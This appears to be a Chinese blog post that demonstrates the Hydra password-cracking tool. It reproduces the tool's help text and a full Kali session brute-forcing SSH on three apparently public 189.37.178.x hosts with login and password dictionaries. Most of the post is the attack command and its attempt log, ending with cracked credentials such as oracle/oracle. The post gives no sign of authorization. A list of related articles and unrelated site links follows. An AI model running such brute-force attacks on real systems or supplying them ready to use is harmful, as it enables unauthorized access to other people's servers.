Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.

Example: hydra -l user -P passlist.txt ftp://192.168.0.1


# 待破解的主机列表
root@kali:~# cat serverlist
189.37.178.1
189.37.178.216
189.37.178.98
# 破解主机的ssh用户名密码
root@kali:~# hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh
Hydra v8. (c) by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have seconds to abort...
[DATA] max tasks per servers, overall tasks, login tries (l:/p:), ~ tries per task
[DATA] attacking service ssh on port
[VERBOSE] Resolving addresses ... done
[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22
[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[][ssh] host:189.37.178.98 login: root
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" - of [child ]
[][ssh] host:189.37.178.1 login: pentest password:
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" - of [child ]
[][ssh] host:189.37.178.216 login: oracle password: oracle
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
of targets successfully completed, valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表

root@kali:~# cat output.txt
# Hydra v8. run at -- :: on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh)
[][ssh] host: 189.37.178.98 login: root
[][ssh] host: 189.37.178.1 login: pentest password:
[][ssh] host: 189.37.178.216 login: oracle password: oracle

安全工具-Hydra的更多相关文章

  1. 路由器密码破解工具 Hydra 7.5

    之前只在 Browser 中保存了路由管理密码,无奈升级时管理的密码丢失了,又不想重新设置,所以尝试破解登录密码. 使用破解工具 Hydra 7.5. # hydra -l username -x : ...

  2. Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用

    Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用 hydra可以破解: http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco a ...

  3. 暴力破解工具hydra与Medusa

    ---恢复内容开始--- 暴力破解工具hydra与Medusa 内容 (一)hadry (二)Medusa (一)hydra 选项 -l LOGIN 指定破解的用户名称,对特定用户破解. -L FIL ...

  4. (总结)Linux下的暴力密码在线破解工具Hydra详解

    (总结)Linux下的暴力密码在线破解工具Hydra详解 学习了:https://blog.csdn.net/yafeichang/article/details/53502869

  5. 初试在线破解工具Hydra爆破3389服务器

    hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持G ...

  6. Linux下暴力破解工具Hydra详解

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  7. [转]Linux下的暴力密码破解工具Hydra详解

    摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/ 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破 ...

  8. linux下暴力破解工具hydra【转】

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  9. linux暴力密码破解工具hydra安装与使用

    说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco ...

  10. Kali中密码暴力破解工具hydra的使用

    前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请 ...

随机推荐

  1. BZOJ.5288.[AHOI/HNOI2018]游戏(思路 拓扑)

    BZOJ LOJ 洛谷 考虑如何预处理每个点能到的区间\([l,r]\). 对于\(i,i+1\)的一扇门,如果钥匙在\(i\)的右边,连边\(i\to i+1\),表示从\(i\)出发到不了\(i+ ...

  2. Java笔记(十七) 异步任务执行服务

    异步任务执行服务 一.基本原理和概念 一)基本接口 1)Runnable和Callable:表示要执行的异步任务. 2)Executor和ExecutorService:表示执行服务. 3)Futur ...

  3. 2190 ACM 数学概率论的乘法和加法原则

    题目:http://acm.hdu.edu.cn/showproblem.php?pid=2190 思路:明显我们要寻找 边长为n和边长为n-1,n-2,n-3·····的规律,这样得出一个递推公式就 ...

  4. centos7下使用yum安装pip

    centos7下使用yum安装pip 首先安装epel扩展源: yum -y install epel-release 更新完成之后,就可安装pip: yum -y install python-pi ...

  5. nodejs,mongodb不同时区问题

    问题:不同国家,使用不同时区,而服务器代码却在国内,跨时区日期不同,根据日期查询,查询不到数据了 1.mongodb存储的new Date()是UTC时间,也就是0时区的时间,世界标准时间 2.参考m ...

  6. MySQL(六)

    自关联 设计省信息的表结构provinces id ptitle 设计市信息的表结构citys id ctitle proid citys表的proid表示城市所属的省,对应着provinces表的i ...

  7. 编程菜鸟的日记-初学尝试编程-C++ Primer Plus 第5章编程练习2

    #include <iostream>using namespace std;const int MAXSIZE=100;int main(){ int a[MAXSIZE]; int s ...

  8. 编程菜鸟的日记-初学尝试编程-C++ Primer Plus 第4章编程练习3

    #include <iostream>#include <cstring>using namespace std;int main(){ char fname[20]; cha ...

  9. .net缓存的应用研究(读篇)

    目前,缓存主要有两种技术:分布式缓存和进程级别的内容缓存.两种缓冲具体的差异就不废话了. 1.在技术上 数据库降压的最好方式就是缓存.在缓存的性能上,进程级别的内存缓存性能有明显优于分布式缓存,内存缓 ...

  10. Html表格:

    (1)<table>标签:声明一个表格,它的常用属性如下: -- border属性 定义表格的边框,设置值是数值 -- cellpadding属性 定义单元格内容与边框的距离,设置值是数值 ...